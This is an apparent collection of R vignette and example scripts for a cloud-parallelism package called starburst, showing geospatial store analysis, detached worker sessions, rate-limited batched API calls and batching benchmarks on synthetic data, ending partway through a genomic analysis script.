#                  "Austin", "Jacksonville", "Fort Worth", "Columbus", "Charlotte",
#                  "San Francisco", "Indianapolis", "Seattle", "Denver", "Boston"),
#   center_lat = c(40.71, 34.05, 41.88, 29.76, 33.45,
#                 39.95, 29.42, 32.72, 32.78, 37.34,
#                 30.27, 30.33, 32.75, 39.96, 35.23,
#                 37.77, 39.77, 47.61, 39.74, 42.36),
#   center_lon = c(-74.01, -118.24, -87.63, -95.37, -112.07,
#                 -75.17, -98.49, -117.16, -96.80, -121.89,
#                 -97.74, -81.66, -97.33, -83.00, -80.84,
#                 -122.42, -86.16, -122.33, -104.99, -71.06),
#   stringsAsFactors = FALSE
# )
# 
# # Generate store locations (5 per region)
# stores <- do.call(rbind, lapply(1:nrow(regions), function(i) {
#   n_stores <- 5
#   # Add random offset to region center
#   data.frame(
#     store_id = (i - 1) * n_stores + 1:n_stores,
#     region_id = regions$region_id[i],
#     region_name = regions$region_name[i],
#     latitude = regions$center_lat[i] + rnorm(n_stores, 0, 0.1),
#     longitude = regions$center_lon[i] + rnorm(n_stores, 0, 0.1),
#     annual_revenue = rlnorm(n_stores, log(1000000), 0.5),
#     stringsAsFactors = FALSE
#   )
# }))
# 
# # Generate competitor locations (10 per region)
# competitors <- do.call(rbind, lapply(1:nrow(regions), function(i) {
#   n_competitors <- 10
#   data.frame(
#     competitor_id = (i - 1) * n_competitors + 1:n_competitors,
#     region_id = regions$region_id[i],
#     latitude = regions$center_lat[i] + rnorm(n_competitors, 0, 0.15),
#     longitude = regions$center_lon[i] + rnorm(n_competitors, 0, 0.15),
#     stringsAsFactors = FALSE
#   )
# }))
# 
# # Generate customer points (1000 per region)
# customers <- do.call(rbind, lapply(1:nrow(regions), function(i) {
#   n_customers <- 1000
#   data.frame(
#     customer_id = (i - 1) * n_customers + 1:n_customers,
#     region_id = regions$region_id[i],
#     latitude = regions$center_lat[i] + rnorm(n_customers, 0, 0.2),
#     longitude = regions$center_lon[i] + rnorm(n_customers, 0, 0.2),
#     annual_spend = rlnorm(n_customers, log(500), 0.8),
#     stringsAsFactors = FALSE
#   )
# }))
# 
# cat(sprintf("Dataset created:\n"))
# cat(sprintf("  %d stores across %d regions\n", nrow(stores), nrow(regions)))
# cat(sprintf("  %s competitors\n", format(nrow(competitors), big.mark = ",")))
# cat(sprintf("  %s customers\n", format(nrow(customers), big.mark = ",")))

## ----spatial-fn, eval=FALSE---------------------------------------------------
# # Haversine distance function (in km)
# haversine_distance <- function(lat1, lon1, lat2, lon2) {
#   R <- 6371  # Earth's radius in km
# 
#   lat1_rad <- lat1 * pi / 180
#   lat2_rad <- lat2 * pi / 180
#   delta_lat <- (lat2 - lat1) * pi / 180
#   delta_lon <- (lon2 - lon1) * pi / 180
# 
#   a <- sin(delta_lat/2)^2 +
#        cos(lat1_rad) * cos(lat2_rad) * sin(delta_lon/2)^2
#   c <- 2 * atan2(sqrt(a), sqrt(1-a))
# 
#   R * c
# }
# 
# analyze_region <- function(region_id, stores_data, competitors_data,
#                           customers_data) {
#   # Filter data for this region
#   region_stores <- stores_data[stores_data$region_id == region_id, ]
#   region_competitors <- competitors_data[competitors_data$region_id == region_id, ]
#   region_customers <- customers_data[customers_data$region_id == region_id, ]
# 
#   if (nrow(region_stores) == 0) {
#     return(NULL)
#   }
# 
#   # Analyze each store
#   store_metrics <- lapply(1:nrow(region_stores), function(i) {
#     store <- region_stores[i, ]
# 
#     # Distance to nearest competitor
#     competitor_distances <- sapply(1:nrow(region_competitors), function(j) {
#       haversine_distance(
#         store$latitude, store$longitude,
#         region_competitors$latitude[j], region_competitors$longitude[j]
#       )
#     })
#     nearest_competitor_km <- min(competitor_distances)
#     avg_competitor_distance <- mean(competitor_distances)
#     competitors_within_5km <- sum(competitor_distances <= 5)
# 
#     # Customer coverage analysis
#     customer_distances <- sapply(1:nrow(region_customers), function(j) {
#       haversine_distance(
#         store$latitude, store$longitude,
#         region_customers$latitude[j], region_customers$longitude[j]
#       )
#     })
# 
#     # Customers within radius
#     customers_1km <- sum(customer_distances <= 1)
#     customers_3km <- sum(customer_distances <= 3)
#     customers_5km <- sum(customer_distances <= 5)
#     customers_10km <- sum(customer_distances <= 10)
# 
#     # Market potential (customers within 5km)
#     nearby_customers <- region_customers[customer_distances <= 5, ]
#     market_potential <- if (nrow(nearby_customers) > 0) {
#       sum(nearby_customers$annual_spend)
#     } else {
#       0
#     }
# 
#     # Average distance to customers
#     avg_customer_distance <- mean(customer_distances)
#     median_customer_distance <- median(customer_distances)
# 
#     # Spatial density (customers per km² within 10km radius)
#     area_10km <- pi * 10^2  # ~314 km²
#     customer_density <- customers_10km / area_10km
# 
#     # Competitive intensity score (0-1, higher = more competitive)
#     competitive_intensity <- min(1, competitors_within_5km / 10)
# 
#     data.frame(
#       store_id = store$store_id,
#       region_id = region_id,
#       region_name = store$region_name,
#       annual_revenue = store$annual_revenue,
#       nearest_competitor_km = nearest_competitor_km,
#       avg_competitor_distance = avg_competitor_distance,
#       competitors_within_5km = competitors_within_5km,
#       customers_1km = customers_1km,
#       customers_3km = customers_3km,
#       customers_5km = customers_5km,
#       customers_10km = customers_10km,
#       market_potential = market_potential,
#       avg_customer_distance = avg_customer_distance,
#       median_customer_distance = median_customer_distance,
#       customer_density = customer_density,
#       competitive_intensity = competitive_intensity,
#       stringsAsFactors = FALSE
#     )
#   })
# 
#   do.call(rbind, store_metrics)
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Analyze 3 regions locally
# test_regions <- c(1, 2, 3)
# 
# cat(sprintf("Analyzing %d regions locally...\n", length(test_regions)))
# local_start <- Sys.time()
# 
# local_results <- lapply(test_regions, analyze_region,
#                        stores_data = stores,
#                        competitors_data = competitors,
#                        customers_data = customers)
# local_metrics <- do.call(rbind, local_results)
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("✓ Completed in %.2f seconds\n", local_time))
# cat(sprintf("  Processed %d stores\n", nrow(local_metrics)))
# cat(sprintf("  Estimated time for all %d regions: %.1f seconds\n",
#             nrow(regions), local_time * (nrow(regions) / length(test_regions))))

## ----cloud, eval=FALSE--------------------------------------------------------
# n_workers <- 20
# 
# cat(sprintf("Analyzing %d regions on %d workers...\n", nrow(regions), n_workers))
# 
# cloud_start <- Sys.time()
# 
# results <- starburst_map(
#   regions$region_id,
#   analyze_region,
#   stores_data = stores,
#   competitors_data = competitors,
#   customers_data = customers,
#   workers = n_workers,
#   cpu = 2,
#   memory = "4GB"
# )
# 
# cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))
# 
# cat(sprintf("\n✓ Completed in %.1f seconds\n", cloud_time))
# 
# # Combine results
# spatial_metrics <- do.call(rbind, results)

## ----analysis, eval=FALSE-----------------------------------------------------
# cat("\n=== Geospatial Analysis Results ===\n\n")
# cat(sprintf("Total stores analyzed: %d\n", nrow(spatial_metrics)))
# cat(sprintf("Regions covered: %d\n\n", length(unique(spatial_metrics$region_id))))
# 
# # Competition metrics
# cat("=== Competition Analysis ===\n")
# cat(sprintf("Average distance to nearest competitor: %.2f km\n",
#             mean(spatial_metrics$nearest_competitor_km)))
# cat(sprintf("Median distance to nearest competitor: %.2f km\n",
#             median(spatial_metrics$nearest_competitor_km)))
# cat(sprintf("Average competitors within 5km: %.1f\n",
#             mean(spatial_metrics$competitors_within_5km)))
# cat(sprintf("Stores with high competition (5+ competitors within 5km): %d (%.1f%%)\n\n",
#             sum(spatial_metrics$competitors_within_5km >= 5),
#             mean(spatial_metrics$competitors_within_5km >= 5) * 100))
# 
# # Customer coverage
# cat("=== Customer Coverage Analysis ===\n")
# cat(sprintf("Average customers within 5km: %.0f\n",
#             mean(spatial_metrics$customers_5km)))
# cat(sprintf("Average market potential (5km radius): $%.0f\n",
#             mean(spatial_metrics$market_potential)))
# cat(sprintf("Average customer density: %.1f customers/km²\n",
#             mean(spatial_metrics$customer_density)))
# cat(sprintf("Median distance to customers: %.2f km\n\n",
#             mean(spatial_metrics$median_customer_distance)))
# 
# # Store performance correlation
# cat("=== Performance Insights ===\n")
# correlation <- cor(spatial_metrics$annual_revenue,
#                    spatial_metrics$market_potential)
# cat(sprintf("Correlation (revenue vs market potential): %.3f\n", correlation))
# 
# # Identify opportunity stores
# opportunity_stores <- spatial_metrics[
#   spatial_metrics$market_potential > median(spatial_metrics$market_potential) &
#   spatial_metrics$competitors_within_5km < median(spatial_metrics$competitors_within_5km),
# ]
# cat(sprintf("\nHigh opportunity stores (low competition, high potential): %d\n",
#             nrow(opportunity_stores)))
# if (nrow(opportunity_stores) > 0) {
#   cat(sprintf("  Average market potential: $%.0f\n",
#               mean(opportunity_stores$market_potential)))
#   cat(sprintf("  Average competitors nearby: %.1f\n",
#               mean(opportunity_stores$competitors_within_5km)))
# }
# 
# # Identify challenged stores
# challenged_stores <- spatial_metrics[
#   spatial_metrics$competitive_intensity > 0.7 &
#   spatial_metrics$market_potential < median(spatial_metrics$market_potential),
# ]
# cat(sprintf("\nChallenged stores (high competition, low potential): %d\n",
#             nrow(challenged_stores)))
# if (nrow(challenged_stores) > 0) {
#   cat(sprintf("  Average market potential: $%.0f\n",
#               mean(challenged_stores$market_potential)))
#   cat(sprintf("  Average competitors nearby: %.1f\n",
#               mean(challenged_stores$competitors_within_5km)))
# }
# 
# # Top regions by market potential
# cat("\n=== Top 5 Regions by Market Potential ===\n")
# region_summary <- aggregate(market_potential ~ region_name,
#                            data = spatial_metrics, FUN = mean)
# region_summary <- region_summary[order(-region_summary$market_potential), ]
# for (i in 1:min(5, nrow(region_summary))) {
#   cat(sprintf("%d. %s: $%.0f\n", i,
#               region_summary$region_name[i],
#               region_summary$market_potential[i]))
# }

## ----zones, eval=FALSE--------------------------------------------------------
# optimize_delivery_zones <- function(region_id, stores_data, customers_data) {
#   region_stores <- stores_data[stores_data$region_id == region_id, ]
#   region_customers <- customers_data[customers_data$region_id == region_id, ]
# 
#   # Assign each customer to nearest store
#   customer_assignments <- lapply(1:nrow(region_customers), function(i) {
#     customer <- region_customers[i, ]
# 
#     distances <- sapply(1:nrow(region_stores), function(j) {
#       haversine_distance(
#         customer$latitude, customer$longitude,
#         region_stores$latitude[j], region_stores$longitude[j]
#       )
#     })
# 
#     nearest_store <- which.min(distances)
# 
#     list(
#       customer_id = customer$customer_id,
#       assigned_store = region_stores$store_id[nearest_store],
#       distance_km = distances[nearest_store],
#       annual_spend = customer$annual_spend
#     )
#   })
# 
#   # Aggregate by store
#   assignments_df <- do.call(rbind, lapply(customer_assignments, as.data.frame))
# 
#   store_zones <- aggregate(
#     cbind(customer_count = customer_id,
#           total_revenue = annual_spend,
#           avg_distance = distance_km) ~ assigned_store,
#     data = assignments_df,
#     FUN = function(x) if (is.numeric(x)) mean(x) else length(x)
#   )
# 
#   store_zones
# }
# 
# # Run optimization
# zone_results <- starburst_map(
#   regions$region_id,
#   optimize_delivery_zones,
#   stores_data = stores,
#   customers_data = customers,
#   workers = 20
# )

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/geospatial.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/geospatial.R", package = "starburst"))

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>",
  eval = FALSE  # Don't run in build
)

## -----------------------------------------------------------------------------
# library(starburst)
# 
# # Create a detached session
# session <- starburst_session(
#   workers = 10,
#   cpu = 4,
#   memory = "8GB"
# )
# 
# # Submit tasks
# task_ids <- lapply(1:100, function(i) {
#   session$submit(quote({
#     # Your long-running computation
#     result <- expensive_analysis(i)
#     result
#   }))
# })
# 
# # Save session ID for later
# session_id <- session$session_id
# print(session_id)  # "session-abc123..."

## -----------------------------------------------------------------------------
# # Check progress anytime
# status <- session$status()
# print(status)
# # Session Status:
# #   Total tasks:     100
# #   Pending:         25
# #   Running:         10
# #   Completed:       60
# #   Failed:          5
# #   Progress:        60.0%

## -----------------------------------------------------------------------------
# # Collect completed results (non-blocking)
# results <- session$collect(wait = FALSE)
# length(results)  # 60 (only completed so far)
# 
# # Or wait for all to complete
# results <- session$collect(wait = TRUE, timeout = 3600)
# length(results)  # 100 (all tasks)

## -----------------------------------------------------------------------------
# # Session 1: Start work
# session <- starburst_session(workers = 20)
# lapply(1:1000, function(i) session$submit(quote(slow_computation(i))))
# session_id <- session$session_id
# 
# # Close R, go home, come back tomorrow...
# 
# # Session 2: Reattach
# session <- starburst_session_attach(session_id)
# status <- session$status()
# results <- session$collect()

## -----------------------------------------------------------------------------
# sessions <- starburst_list_sessions()
# print(sessions)
# #   session_id         created_at           last_activity        total_tasks pending running completed failed
# #   session-abc123     2026-02-06 10:00:00  2026-02-06 10:15:00  100         0       5       90        5
# #   session-def456     2026-02-05 14:30:00  2026-02-05 18:45:00  500         0       0       500       0

## -----------------------------------------------------------------------------
# # Extend session timeout by 1 hour
# session$extend(seconds = 3600)

## -----------------------------------------------------------------------------
# # Terminate workers and mark session complete
# session$cleanup()

## -----------------------------------------------------------------------------
# session <- starburst_session(
#   workers = 50,
#   launch_type = "EC2",
#   instance_type = "c8a.xlarge",  # AMD 8th gen
#   use_spot = TRUE                 # 70% cheaper
# )

## -----------------------------------------------------------------------------
# # Tasks that fail are tracked
# session <- starburst_session(workers = 5)
# 
# lapply(1:10, function(i) {
#   session$submit(quote({
#     if (i == 5) stop("Intentional error")
#     i * 2
#   }))
# })
# 
# # Check status
# status <- session$status()
# print(status)
# # Failed: 1
# 
# # Failed tasks are still in results with error info
# results <- session$collect(wait = TRUE)
# failed_task <- results[[5]]
# print(failed_task$error)
# # TRUE
# print(failed_task$message)
# # "Intentional error"

## -----------------------------------------------------------------------------
# session <- starburst_session(workers = 10)
# 
# # Submit mix of fast and slow tasks
# lapply(1:5, function(i) session$submit(quote(i * 2)))        # Fast
# lapply(1:5, function(i) session$submit(quote({ Sys.sleep(60); i })))  # Slow
# 
# Sys.sleep(10)
# 
# # Get fast results immediately
# results <- session$collect(wait = FALSE)
# length(results)  # 5 (fast tasks done)
# 
# # Later, get remaining results
# Sys.sleep(60)
# results <- session$collect(wait = FALSE)
# length(results)  # 10 (all done)

## -----------------------------------------------------------------------------
# # Start with fewer workers, let them process queue
# session <- starburst_session(workers = 5)
# 
# # Submit large batch
# lapply(1:1000, function(i) session$submit(quote(work(i))))
# 
# # Workers process tasks continuously until queue empty
# # Then auto-terminate after 5 min idle

## -----------------------------------------------------------------------------
# # Cost-effective setup
# session <- starburst_session(
#   workers = 20,
#   launch_type = "EC2",
#   instance_type = "c8a.xlarge",
#   use_spot = TRUE,
#   session_timeout = 3600,
#   absolute_timeout = 86400
# )

## -----------------------------------------------------------------------------
# # Error: Session not found: session-xyz
# # - Check session ID is correct
# # - Verify region matches (use region parameter)
# # - Session may have expired (check absolute_timeout)

## -----------------------------------------------------------------------------
# # Check session status
# status <- session$status()
# 
# # If pending tasks stuck:
# # - Workers may have terminated (check idle timeout)
# # - Launch more workers: (not yet implemented)
# # - Check CloudWatch logs: starburst_logs(session_id)

## -----------------------------------------------------------------------------
# # Workers exit after 5 min idle by default
# # For sporadic task submission, relaunch workers periodically
# # (Auto-scaling based on pending tasks coming in future release)

## -----------------------------------------------------------------------------
# library(starburst)
# 
# # Process 1000 samples overnight
# session <- starburst_session(
#   workers = 100,
#   cpu = 8,
#   memory = "32GB",
#   launch_type = "EC2",
#   use_spot = TRUE
# )
# 
# # Submit all samples
# sample_files <- list.files("samples/", pattern = "*.fastq")
# task_ids <- lapply(sample_files, function(file) {
#   session$submit(quote({
#     library(Rsubread)
#     results <- align_and_quantify(file)
#     save_results(results, file)
#     results
#   }))
# })
# 
# # Check progress next morning
# session <- starburst_session_attach(session$session_id)
# status <- session$status()
# # Completed: 950, Running: 45, Failed: 5
# 
# results <- session$collect(wait = TRUE)

## -----------------------------------------------------------------------------
# # Run 10,000 simulations
# session <- starburst_session(workers = 50)
# 
# n_sims <- 10000
# lapply(1:n_sims, function(i) {
#   session$submit(quote({
#     set.seed(i)
#     run_simulation()
#   }))
# })
# 
# # Check progress periodically
# repeat {
#   status <- session$status()
#   print(sprintf("Progress: %.1f%%", 100 * status$completed / status$total))
# 
#   if (status$completed == n_sims) break
#   Sys.sleep(60)
# }
# 
# results <- session$collect()

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)
# library(httr)
# library(jsonlite)

## ----api-function, eval=FALSE-------------------------------------------------
# fetch_company_data <- function(ticker) {
#   # Add small delay to respect rate limits
#   Sys.sleep(runif(1, 0.1, 0.3))
# 
#   # For demo purposes, we'll use a public API
#   # In practice, replace with your actual API endpoint
#   base_url <- "https://api.example.com/company"
# 
#   tryCatch({
#     # Fetch company info
#     response <- httr::GET(
#       paste0(base_url, "/", ticker),
#       httr::timeout(10),
#       httr::add_headers(
#         "User-Agent" = "staRburst-example/1.0"
#       )
#     )
# 
#     # Check for success
#     if (httr::status_code(response) == 200) {
#       data <- httr::content(response, "parsed")
# 
#       # Extract relevant fields
#       list(
#         ticker = ticker,
#         success = TRUE,
#         company_name = data$name %||% NA,
#         market_cap = data$marketCap %||% NA,
#         pe_ratio = data$peRatio %||% NA,
#         revenue = data$revenue %||% NA,
#         employees = data$employees %||% NA,
#         sector = data$sector %||% NA,
#         timestamp = Sys.time()
#       )
#     } else {
#       # Handle API errors
#       list(
#         ticker = ticker,
#         success = FALSE,
#         error = paste("HTTP", httr::status_code(response)),
#         timestamp = Sys.time()
#       )
#     }
#   }, error = function(e) {
#     # Handle network errors
#     list(
#       ticker = ticker,
#       success = FALSE,
#       error = as.character(e),
#       timestamp = Sys.time()
#     )
#   })
# }
# 
# # Helper: null-coalescing operator
# `%||%` <- function(x, y) if (is.null(x)) y else x

## ----mock-api, eval=FALSE-----------------------------------------------------
# # Mock function that simulates API with realistic delays
# fetch_company_data_mock <- function(ticker) {
#   # Simulate network latency
#   Sys.sleep(runif(1, 0.2, 0.8))
# 
#   # Simulate occasional failures (5% rate)
#   if (runif(1) < 0.05) {
#     return(list(
#       ticker = ticker,
#       success = FALSE,
#       error = "API timeout",
#       timestamp = Sys.time()
#     ))
#   }
# 
#   # Generate mock data
#   list(
#     ticker = ticker,
#     success = TRUE,
#     company_name = paste("Company", ticker),
#     market_cap = round(rnorm(1, 50e9, 20e9), 0),
#     pe_ratio = round(rnorm(1, 25, 10), 2),
#     revenue = round(rnorm(1, 10e9, 5e9), 0),
#     employees = round(rnorm(1, 50000, 20000), 0),
#     sector = sample(c("Technology", "Healthcare", "Finance", "Energy"), 1),
#     timestamp = Sys.time()
#   )
# }

## ----sample-data, eval=FALSE--------------------------------------------------
# # Generate mock ticker symbols
# set.seed(123)
# n_companies <- 1000
# tickers <- paste0(
#   sample(LETTERS, n_companies, replace = TRUE),
#   sample(LETTERS, n_companies, replace = TRUE),
#   sample(LETTERS, n_companies, replace = TRUE)
# )
# 
# head(tickers)
# # [1] "NAL" "RPL" "OQM" "TYW" "AIT" "UMD"

## ----local, eval=FALSE--------------------------------------------------------
# cat(sprintf("Fetching data for %d companies locally...\n", length(tickers)))
# 
# local_start <- Sys.time()
# local_results <- lapply(head(tickers, 50), fetch_company_data_mock)
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("✓ Completed 50 calls in %.1f seconds\n", local_time))
# cat(sprintf("  Estimated time for %d: %.1f minutes\n",
#             n_companies, local_time * n_companies / 50 / 60))

## ----cloud, eval=FALSE--------------------------------------------------------
# cat(sprintf("Fetching data for %d companies on AWS...\n", n_companies))
# 
# results <- starburst_map(
#   tickers,
#   fetch_company_data_mock,
#   workers = 25,
#   cpu = 1,
#   memory = "2GB"
# )

## ----analysis, eval=FALSE-----------------------------------------------------
# # Convert results to data frame
# results_df <- do.call(rbind, lapply(results, function(x) {
#   if (x$success) {
#     data.frame(
#       ticker = x$ticker,
#       company_name = x$company_name,
#       market_cap = x$market_cap,
#       pe_ratio = x$pe_ratio,
#       revenue = x$revenue,
#       employees = x$employees,
#       sector = x$sector,
#       success = TRUE,
#       error = NA,
#       stringsAsFactors = FALSE
#     )
#   } else {
#     data.frame(
#       ticker = x$ticker,
#       company_name = NA,
#       market_cap = NA,
#       pe_ratio = NA,
#       revenue = NA,
#       employees = NA,
#       sector = NA,
#       success = FALSE,
#       error = x$error,
#       stringsAsFactors = FALSE
#     )
#   }
# }))
# 
# # Summary
# success_rate <- mean(results_df$success) * 100
# cat(sprintf("\n=== Results Summary ===\n"))
# cat(sprintf("Total companies: %d\n", nrow(results_df)))
# cat(sprintf("Successful fetches: %d (%.1f%%)\n",
#             sum(results_df$success), success_rate))
# cat(sprintf("Failed fetches: %d\n", sum(!results_df$success)))
# 
# # Show sample of results
# cat("\n=== Sample Results ===\n")
# print(head(results_df[results_df$success, ], 10))
# 
# # Sector distribution
# cat("\n=== Sector Distribution ===\n")
# print(table(results_df$sector))
# 
# # Market cap summary
# cat("\n=== Market Cap Summary ===\n")
# cat(sprintf("Mean: $%.2fB\n",
#             mean(results_df$market_cap, na.rm = TRUE) / 1e9))
# cat(sprintf("Median: $%.2fB\n",
#             median(results_df$market_cap, na.rm = TRUE) / 1e9))
# cat(sprintf("Range: $%.2fB - $%.2fB\n",
#             min(results_df$market_cap, na.rm = TRUE) / 1e9,
#             max(results_df$market_cap, na.rm = TRUE) / 1e9))

## ----rate-limiting, eval=FALSE------------------------------------------------
# # Add jitter to respect rate limits
# fetch_with_rate_limit <- function(ticker, rate_limit = 100) {
#   # Add delay based on rate limit (calls per minute)
#   delay <- 60 / rate_limit + runif(1, 0, 0.1)
#   Sys.sleep(delay)
# 
#   fetch_company_data(ticker)
# }
# 
# # Use with staRburst
# results <- starburst_map(
#   tickers,
#   function(x) fetch_with_rate_limit(x, rate_limit = 100),
#   workers = 10  # Adjust workers based on API rate limit
# )

## ----error-handling, eval=FALSE-----------------------------------------------
# fetch_with_retry <- function(ticker, max_retries = 3) {
#   for (attempt in 1:max_retries) {
#     result <- fetch_company_data(ticker)
# 
#     if (result$success) {
#       return(result)
#     }
# 
#     # Exponential backoff
#     if (attempt < max_retries) {
#       Sys.sleep(2^attempt + runif(1, 0, 1))
#     }
#   }
# 
#   # Return failure after all retries
#   result$error <- paste("Failed after", max_retries, "retries:", result$error)
#   return(result)
# }

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/api-calls.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/api-calls.R", package = "starburst"))

#!/usr/bin/env Rscript

# ============================================================================
# THE WINNING SCENARIO: Heavy Batching Strategy
# ============================================================================
#
# This example demonstrates the optimal batching strategy:
# - Process 1000 data chunks (1.5s each = 1500s total work)
# - Batch into 20 groups of 50 chunks each
# - Each batch takes ~75 seconds (50 × 1.5s)
# - Cloud overhead (2-3s) is only 3-4% of work time
# - Expected speedup: 15-20x with 20 workers
#
# The key: Each worker processes 50 operations in a single task!
# ============================================================================

suppressPackageStartupMessages({
  library(starburst)
})

cat("=== WINNING SCENARIO: Heavy Batching for Maximum Speedup ===\n\n")

# Configuration
total_chunks <- 1000
chunks_per_batch <- 50
n_batches <- total_chunks / chunks_per_batch

cat("Processing", total_chunks, "data chunks\n")
cat("Batching:", n_batches, "batches of", chunks_per_batch, "chunks each\n")
cat("Expected per-batch time: ~75 seconds (", chunks_per_batch, "× 1.5s)\n\n")

# Realistic data processing function
process_chunk <- function(chunk_id) {
  # Simulate realistic data processing
  # Each chunk: 10k rows, 5 operations
  n <- 10000

  # Operation 1: Data generation
  data <- data.frame(
    id = 1:n,
    value1 = rnorm(n),
    value2 = rnorm(n),
    category = sample(LETTERS[1:5], n, replace = TRUE)
  )

  # Operation 2: Feature engineering
  data$ratio <- data$value1 / (abs(data$value2) + 0.1)
  data$interaction <- data$value1 * data$value2

  # Operation 3: Aggregation
  agg <- aggregate(cbind(value1, value2, ratio) ~ category, data, mean)

  # Operation 4: Statistical test
  test_results <- lapply(unique(data$category), function(cat) {
    subset_data <- data[data$category == cat, ]
    list(
      category = cat,
      mean = mean(subset_data$ratio),
      sd = sd(subset_data$ratio),
      n = nrow(subset_data)
    )
  })

  # Operation 5: Summary
  list(
    chunk_id = chunk_id,
    n_rows = n,
    aggregates = agg,
    tests = test_results
  )
}

# Batch processing function (runs on each worker)
process_batch <- function(chunk_ids) {
  lapply(chunk_ids, process_chunk)
}

# Test single chunk timing
cat("Testing single chunk timing...\n")
single_start <- Sys.time()
test_result <- process_chunk(1)
single_time <- as.numeric(difftime(Sys.time(), single_start, units = "secs"))
cat(sprintf("Single chunk: %.2f seconds\n\n", single_time))

# LOCAL: Process subset sequentially
local_subset <- 20
cat(sprintf("LOCAL: Processing %d chunks to estimate full time...\n", local_subset))
local_start <- Sys.time()
local_results <- lapply(1:local_subset, process_chunk)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
local_per_chunk <- local_time / local_subset
local_estimated <- local_per_chunk * total_chunks

cat(sprintf("✓ %d chunks in %.1f seconds\n", local_subset, local_time))
cat(sprintf("  Per chunk: %.2f seconds\n", local_per_chunk))
cat(sprintf("  Estimated for %d: %.1f seconds (%.1f minutes)\n\n",
            total_chunks, local_estimated, local_estimated / 60))

# Create batches
batches <- split(1:total_chunks, ceiling(seq_along(1:total_chunks) / chunks_per_batch))

# CLOUD: Process all batches in parallel
n_workers <- length(batches)  # One batch per worker
cat(sprintf("CLOUD: Processing %d batches with %d workers...\n",
            length(batches), n_workers))
cat(sprintf("Each worker processes %d chunks (~%.0f seconds)\n\n",
            chunks_per_batch, chunks_per_batch * single_time))

cloud_start <- Sys.time()
cloud_results <- starburst_map(
  batches,
  process_batch,
  workers = n_workers
)
cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("✓ Completed in %.1f seconds (%.1f minutes)\n\n",
            cloud_time, cloud_time / 60))

# Results
speedup <- local_estimated / cloud_time
time_saved <- local_estimated - cloud_time
efficiency <- (speedup / n_workers) * 100

cat("╔══════════════════════════════════════════════════╗\n")
cat("║        HEAVY BATCHING RESULTS                    ║\n")
cat("╚══════════════════════════════════════════════════╝\n\n")

cat(sprintf("Total chunks processed: %d\n", total_chunks))
cat(sprintf("Batches: %d batches of %d chunks\n\n", length(batches), chunks_per_batch))

cat("┌────────────────────────────────────────────────┐\n")
cat("│ PERFORMANCE COMPARISON                         │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Local (estimated): %.1f min               │\n", local_estimated / 60))
cat(sprintf("│ Cloud (%d workers): %.1f min              │\n", n_workers, cloud_time / 60))
cat(sprintf("│ Speedup: %.1fx                            │\n", speedup))
cat(sprintf("│ Time saved: %.1f minutes                  │\n", time_saved / 60))
cat(sprintf("│ Efficiency: %.0f%% of ideal (%dx workers) │\n", efficiency, n_workers))
cat("└────────────────────────────────────────────────┘\n\n")

cat("┌────────────────────────────────────────────────┐\n")
cat("│ WHY THIS WORKS                                 │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Work per batch: ~%.0f seconds              │\n", chunks_per_batch * single_time))
cat("│ Cloud overhead: ~2-3 seconds                   │\n")
cat(sprintf("│ Overhead impact: %.1f%%                     │\n",
            (3 / (chunks_per_batch * single_time)) * 100))
cat("└────────────────────────────────────────────────┘\n\n")

cat("✓ Heavy batching completed!\n\n")

if (speedup >= 15) {
  cat(sprintf("🎉 Achieved %.1fx speedup - batching strategy works!\n", speedup))
} else if (speedup >= 10) {
  cat(sprintf("✓ Good %.1fx speedup - consider larger batches for more\n", speedup))
} else {
  cat(sprintf("⚠️  Only %.1fx speedup - batches may still be too small\n", speedup))
}

#!/usr/bin/env Rscript

# ============================================================================
# REAL SCIENCE: Genomic Variant Analysis at Scale
# ============================================================================
#
# Realistic bioinformatics workload:
# - Analyze 1,000 genomic samples
# - Each sample: 50,000 variants across 20,000 genes
# - Compute: Hardy-Weinberg equilibrium, LD, association tests
# - Per sample: ~10-15 minutes of computation
# - Total sequential time: ~200 hours
# - With 100 workers: ~2 hours
# - Expected speedup: 100x
#
# This is REAL SCIENCE, not a toy example.
# ============================================================================

suppressPackageStartupMessages({
  library(starburst)
})

cat("=== REAL SCIENCE: Genomic Variant Analysis ===\n\n")

# Configuration for real scientific scale
n_samples <- 1000          # 1000 patient samples
n_variants <- 50000        # 50k variants per sample
n_genes <- 20000           # 20k genes
n_phenotypes <- 50         # 50 phenotypic traits
samples_per_worker <- 10   # Batch for efficiency

cat("Genomic Analysis Configuration:\n")
cat(sprintf("  Samples: %s\n", format(n_samples, big.mark = ",")))
cat(sprintf("  Variants per sample: %s\n", format(n_variants, big.mark = ",")))
cat(sprintf("  Genes: %s\n", format(n_genes, big.mark = ",")))
cat(sprintf("  Phenotypes: %d\n", n_phenotypes))
cat(sprintf("\nTotal variant calls: %s\n\n",
            format(n_samples * n_variants, big.mark = ",")))

# Realistic genomic analysis function
analyze_sample_batch <- function(sample_ids) {
  results <- lapply(sample_ids, function(sample_id) {
    set.seed(sample_id)

    # Generate realistic genotype data (0, 1, 2 copies)
    # 50,000 variants × 1 sample
    genotypes <- matrix(
      sample(0:2, n_variants, replace = TRUE, prob = c(0.64, 0.32, 0.04)),
      nrow = n_variants,
      ncol = 1
    )

    # Generate phenotype data
    phenotypes <- rnorm(n_phenotypes)

    # Analysis 1: Allele frequency calculation
    allele_freq <- rowMeans(genotypes) / 2

    # Analysis 2: Hardy-Weinberg Equilibrium test
    # For each variant, test if genotype frequencies match HWE expectations
    hwe_pvalues <- sapply(1:min(1000, n_variants), function(i) {
      geno <- genotypes[i, ]
      p <- mean(geno) / 2  # allele frequency

      # Expected frequencies under HWE
